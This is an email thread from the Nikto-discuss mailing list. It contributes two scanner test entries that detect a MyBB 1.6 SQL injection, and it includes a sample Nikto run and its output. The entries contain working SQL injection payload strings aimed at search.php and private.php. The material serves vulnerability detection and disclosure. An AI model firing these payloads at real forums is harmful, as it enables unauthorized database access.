Added these, thanks!<br><br><div class="gmail_quote">On Thu, Dec 23, 2010 at 1:34 PM, YGN Ethical Hacker Group <span dir="ltr"><<a href="mailto:lists@yehg.net">lists@yehg.net</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">

<span style="font-family: courier new,monospace;">udb_tests<br>=========<br><br><span style="font-family: courier new,monospace;">"400000","0","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBB 1.6 <= SQL Injection,  ref: <a href="http://yehg.net/lab/pr0js/advisories/%5Bmybb1.6%5D_sql_injection" target="_blank">http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection</a>","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""<br>



<br style="font-family: courier new,monospace;"></span><span style="font-family: courier new,monospace;">"400001","0","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBBx 1.6 <= SQL Injection,  ref: <a href="http://yehg.net/lab/pr0js/advisories/%5Bmybb1.6%5D_sql_injection" target="_blank">http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection</a>","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""</span><br>



<br><br>Testing<br>========<br><br><br>>perl <a href="http://nikto.pl" target="_blank">nikto.pl</a> -h <a href="http://attacker.in" target="_blank">http://attacker.in</a> -root /mybb -useproxy </span><br style="font-family: courier new,monospace;">

<br style="font-family: courier new,monospace;">

<span style="font-family: courier new,monospace;">+ Target Port:        80</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">+ Proxy:              localhost:8080</span><br style="font-family: courier new,monospace;">



<span style="font-family: courier new,monospace;">+ Start Time:         2010-12-25 02:28:34</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">---------------------------------------------------------------------------</span><br style="font-family: courier new,monospace;">



<span style="font-family: courier new,monospace;">+ Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635</span><br style="font-family: courier new,monospace;">



<span style="font-family: courier new,monospace;"> DAV/2</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">+ /search.php: MyBB 1.6 <= SQL Injection,  ref: <a href="http://yehg.net/lab/pr0js/advisories/%5Bmybb1.6%5D_sql_injection" target="_blank">http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection</a></span><br style="font-family: courier new,monospace;">



<span style="font-family: courier new,monospace;">+ 2 items checked: 0 error(s) and 1 item(s) reported on remote host</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">+ End Time:           2010-12-25 02:28:52 (18 seconds)</span><br style="font-family: courier new,monospace;">



<span style="font-family: courier new,monospace;">---------------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">+ 1 host(s) tested</span><br style="font-family: courier new,monospace;">



<br><br>---------------------------------<br>Best regards,<br><font color="#888888">YGN Ethical Hacker Group<br>Yangon, Myanmar<br><a href="http://yehg.net" target="_blank">http://yehg.net</a><br>Our Lab | <a href="http://yehg.net/lab" target="_blank">http://yehg.net/lab</a><br>



Our Directory | <a href="http://yehg.net/hwd" target="_blank">http://yehg.net/hwd</a><br>
</font><br>_______________________________________________<br>
Nikto-discuss mailing list<br>
<a href="mailto:Nikto-discuss@attrition.org">Nikto-discuss@attrition.org</a><br>
<a href="https://attrition.org/mailman/listinfo/nikto-discuss" target="_blank">https://attrition.org/mailman/listinfo/nikto-discuss</a><br>
<br></blockquote></div><br><br clear="all"><br>-- <br><br><a href="http://www.cirt.net">http://www.cirt.net</a>     |      <a href="http://www.osvdb.org/">http://www.osvdb.org/</a><br>